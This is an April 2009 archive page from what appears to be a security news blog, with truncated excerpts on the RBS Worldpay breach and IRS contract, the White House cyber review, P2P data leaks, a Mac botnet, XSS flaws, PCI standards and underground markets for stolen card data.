Monthly Archive for April, 2009
The Internal Revenue Service has awarded a contract to process tax return payments for the coming filing season to RBS Worldpay, a company that recently disclosed that a hacker break-in jeopardized financial data on 1.5 million payroll card holders and at least 1.1 million Social Security numbers. The contract award comes a month after credit card giant Visa said RBS was no longer in compliance with the Payment Card Industry (PCI) security standards, a set of guidelines designed to protect cardholder data. RBS spokesman Josh Passman said the company expects to be re-certified as PCI compliant "within the next few weeks." The contract awarded to RBS is a what's known as a "zero dollar" contract, meaning the government doesn't award a specific dollar amount. Rather, the approved vendor takes a convenience fee for each transaction it processes. According to a copy of the contract listed at fedbizopps.gov, RBS's base convenience
Those who were hoping to hear details today about how the Obama administration plans to revamp the government's approach to cyber security threats may have to wait a little while longer. In a much-anticipated speech at the RSA security conference in San Francisco today, Melissa Hathaway, the White House's top cyber official, instead highlighted all of the meetings, studies, and recommendations that have informed the administration's 60-day cyberspace policy review, which was completed last week. But details about how the administration might seek to organize and streamline the government's cyber efforts were lacking. Much of the coverage of the administration's cyber review has focused on the power struggle on cyber underway between the Department of Homeland Security and the National Security Agency. The Obama administration also is finalizing plans for a new Pentagon command to coordinate the security of military computer networks and to develop new offensive cyber weapons. Meanwhile,
 Smart. It's the new speed. Introducing the new Intel® Xeon® Processor 5500 Series. It adapts to low workloads so you and your servers can use less energy. That’s the new IT intelligence. See why information technology is now intelligent technology. www.intel.com/business/xeon/index.htm |
A key oversight panel in the House of Representatives said this week that it is re-opening an investigation into the "indavertent sharing" of sensitive government and consumer data through popular peer-to-peer file swapping programs such as BearShare and Limewire. The inquiry from the House Committee on Oversight and Government Reform comes just weeks after revelations that blueprints for Marine One -- President Barack Obama's helicopter -- were being traded on P2P networks. Committee Chairman Edolphus Towns (D-N.Y.) and ranking Republican Darrell E. Issa (Calif.) sent a letter (PDF) to Attorney General Eric Holder, asking the Justice Department to detail what it is doing to protect Americans from the dangers of data breaches via P2P networks. The committee also asked (PDF) Federal Trade Commission Chairman Jonathan Leibowitz what his agency was doing to investigate P2P networks, and whether the makers of P2P software were adequately disclosing to consumers the risks associated
Last week, I spoke to Joe Stewart, a senior security researcher at Atlanta based SecureWorks who probably has done more than any other researcher to make life more difficult and expensive for cyber crooks. Stewart is speaking at the RSA Security conference in San Francisco on Thursday about what he thinks can be done to institutionalize some of these efforts. Stewart says the world needs a more concerted effort to identify -- if not apprehend -- top cyber criminal actors. He also said that ISPs need to be held more accountable when they ignore overt signs of persistent criminal activity on their networks. What follows are some excerpts from our discussion: Stewart: We've had some small victories here and there, but overall the Internet security community hasn't been terribly effective. We're not really stopping them. BK: Why do you think that is? Stewart: One of the conclusions we came to
Cyber spies have broken into the Pentagon's $300 billion Joint Strike Fighter project - the defense department's costliest weapons program ever, according to the lead item in today's Wall Street Journal. From the story: Similar incidents have also breached the Air Force's air-traffic-control system in recent months, these people say. In the case of the fighter-jet program, the intruders were able to copy and siphon off several terabytes of data related to design and electronics systems, officials say, potentially making it easier to defend against the craft. Attacks like these -- or U.S. awareness of them -- appear to have escalated in the past six months, said one former official briefed on the matter. "There's never been anything like it," this person said, adding that other military and civilian agencies as well as private companies are affected. "It's everything that keeps this country going. The disclosure is the latest tale
This morning, as I scrolled down the list of security Web sites I normally check via my RSS reader, I noticed several items referencing news about the "world's first Mac botnet." As I read on, it became clear this was neither news nor a first. Ryan Naraine from ZDNet.com writes about a paper released via Virus Bulletin (subscription required) by a pair of Symantec researchers who found what was described as "the first Mac OS X botnet launching denial-of-service attacks." The story goes on to describe how the researchers traced the botnet back to Mac users who had installed pirated copies of Apple's iWork 2009 software. Back in January, many tech outlets wrote about a Trojan that was being distributed with copies of iWork 2009, that was available on Bittorrent and other file-sharing services. In my own coverage of that Trojan, I interviewed Pete Yandell, a software developer from Australia
Thousands of Web sites that were cited last year for harboring security flaws that could be used to attack others online remain a hazard and an eyesore along the information superhighway. At issue are sites that harbor so-called cross-site scripting (XSS) vulnerabilities, which occur when Web sites accept input from a user -- usually from something like a search box or e-mail form -- but do not prevent users from entering malicious code or other instructions. Once the code is entered, the URL that the Web site spits back can then be used for phishing scams. Unlike other scams, the URLs used in these cases look more legitimate. A typical XSS attack usually goes like this: The bad guys send out e-mails designed to look like they were sent by a trusted e-commerce company. The e-mails instruct recipients to click on a link and update their account information. Instead of
Featured Advertiser
 Visual Studio Team System helps teams of every size collaborate better for faster app development. Get a Free Trial at microsoft.com/defyallchallenges/team |
The number, scale and sophistication of data breaches fueled by hackers last year is rekindling the debate over the efficacy of the credit card industry's security standards for safeguarding customer data. All merchants that handle credit and debit card data are required to show that they have met the payment card industry data security standards (PCI DSS), a set of technical and operational requirements designed to safeguard cardholder information from theft or unauthorized access. Yet, some of the most notable data breach incidents last year targeted companies that had recently been certified as compliant with those standards, raising the question of whether the standards go far enough, or if entities that experienced a breach are falling out of compliance with the practices that led to their certification. In a recent hearing on PCI standards at a House Homeland Security Committee panel, experts from the retail sector charged that the entire
A massive glut in the number of credit and debit cards stolen in data breaches at financial institutions last year has flooded criminal underground markets that trade in this material, driving prices for the illicit goods to the lowest levels seen in years, experts have found. For a glimpse of just how many financial records were lost to hackers last year, consider the stats released this week by Verizon Business. The company said it responded to at least 90 confirmed data breaches last year involving roughly 285 million consumer records, a number that exceeded the combined total number of breached records from cases the company investigated from 2004 to 2007. Breaches at banks and financial institutions were responsible for 93 percent of all such records compromised last year, Verizon found. As a result, the stolen identities and credit and debit cards for sale in the underground markets is outpacing demand
